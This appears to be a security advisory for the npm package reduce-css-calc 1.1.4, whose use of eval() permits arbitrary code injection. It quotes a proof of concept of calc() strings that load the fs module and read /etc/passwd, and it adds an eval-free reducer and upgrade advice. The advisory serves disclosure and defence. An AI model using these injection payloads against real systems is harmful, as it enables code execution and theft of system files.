reduce-css-calc@1.1.4

Vulnerabilities 1 via 1 paths
Dependencies 3
Source npm
Package reduce-css-calc

high severity

Arbitrary Code Injection

  • Vulnerable module: reduce-css-calc
  • Introduced through: reduce-css-calc@1.1.4

Detailed paths

  • Introduced through: reduce-css-calc@1.1.4
    Remediation: Upgrade to reduce-css-calc@1.2.5.

Overview

reduce-css-calc is a package that reduces CSS calc() expressions as far as possible. Affected versions of the package use eval() to evaluate the expression, allowing an attacker to gain arbitrary code execution via specially crafted input.

Example

The issue was reported by ChALkeR and demonstrated by his example below:

const reduceCSSCalc = require('reduce-css-calc');
console.log(reduceCSSCalc(`calc(                       (Buffer(10000)))`));
console.log(reduceCSSCalc(`calc(                       (global['fs'] = require('fs')))`));
console.log(reduceCSSCalc(`calc(                       (fs['readFileSync']("/etc/passwd", "utf-8")))`));
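For contrast, an added example (not reduce-css-calc's own code, nor part of ChALkeR's report) of how a calc() reducer can evaluate the expression without eval(): a strict tokenizer followed by a recursive-descent evaluator, so the payloads above are rejected as syntax errors instead of being executed. The accepted unit list and the names tokenize, evaluate and reduceCalcSafe are assumptions made for this example.

```javascript
// Added example, not reduce-css-calc's own code: a calc() reducer that never calls eval().
function tokenize(expr) {
  // Whitelist: a number with an optional known unit, or one of + - * / ( ). Nothing else.
  const re = /\s*(?:(\d+(?:\.\d+)?)(px|em|rem|%|vw|vh)?|([-+*\/()]))\s*/y;
  const out = [];
  for (let pos = 0; pos < expr.length; pos = re.lastIndex) {
    re.lastIndex = pos;
    const m = re.exec(expr);
    if (!m) throw new Error(`rejected input at offset ${pos}: ${expr.slice(pos, pos + 12)}`);
    out.push(m[3] ? { op: m[3] } : { value: parseFloat(m[1]), unit: m[2] || '' });
  }
  return out;
}

// Recursive-descent evaluator: + and - need equal units, * needs a unitless side, / a nonzero unitless divisor.
function evaluate(tokens) {
  let i = 0;
  const peek = () => tokens[i]?.op;
  function primary() {
    const t = tokens[i++];
    if (t?.op === '-') { const v = primary(); return { value: -v.value, unit: v.unit }; }
    if (t && !t.op) return t;                       // a number, with or without unit
    if (t?.op !== '(') throw new Error('unexpected token or end of expression');
    const v = sum();
    if (tokens[i++]?.op !== ')') throw new Error('expected )');
    return v;
  }
  function binary(next, ops, apply) {               // one left-associative precedence level
    let l = next();
    while (peek() && ops.includes(peek())) { const op = tokens[i++].op; l = apply(op, l, next()); }
    return l;
  }
  const product = () => binary(primary, '*/', (op, l, r) => {
    if (op === '*' ? l.unit && r.unit : r.unit || r.value === 0) throw new Error(`invalid operand for ${op}`);
    return { value: op === '*' ? l.value * r.value : l.value / r.value, unit: l.unit || r.unit };
  });
  const sum = () => binary(product, '+-', (op, l, r) => {
    if (l.unit !== r.unit) throw new Error(`unit mismatch: ${l.unit || 'number'} vs ${r.unit || 'number'}`);
    return { value: op === '+' ? l.value + r.value : l.value - r.value, unit: l.unit };
  });
  const v = sum();
  if (i !== tokens.length) throw new Error('trailing input after expression');
  return v;
}

function reduceCalcSafe(css) {
  const m = /^calc\((.*)\)$/s.exec(css.trim());
  if (!m) throw new Error('not a calc() expression');
  const r = evaluate(tokenize(m[1]));
  return `${+r.value.toFixed(4)}${r.unit}`;           // e.g. "16px"
}
```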

Remediation

Upgrade reduce-css-calc to version 1.2.5 or later.

References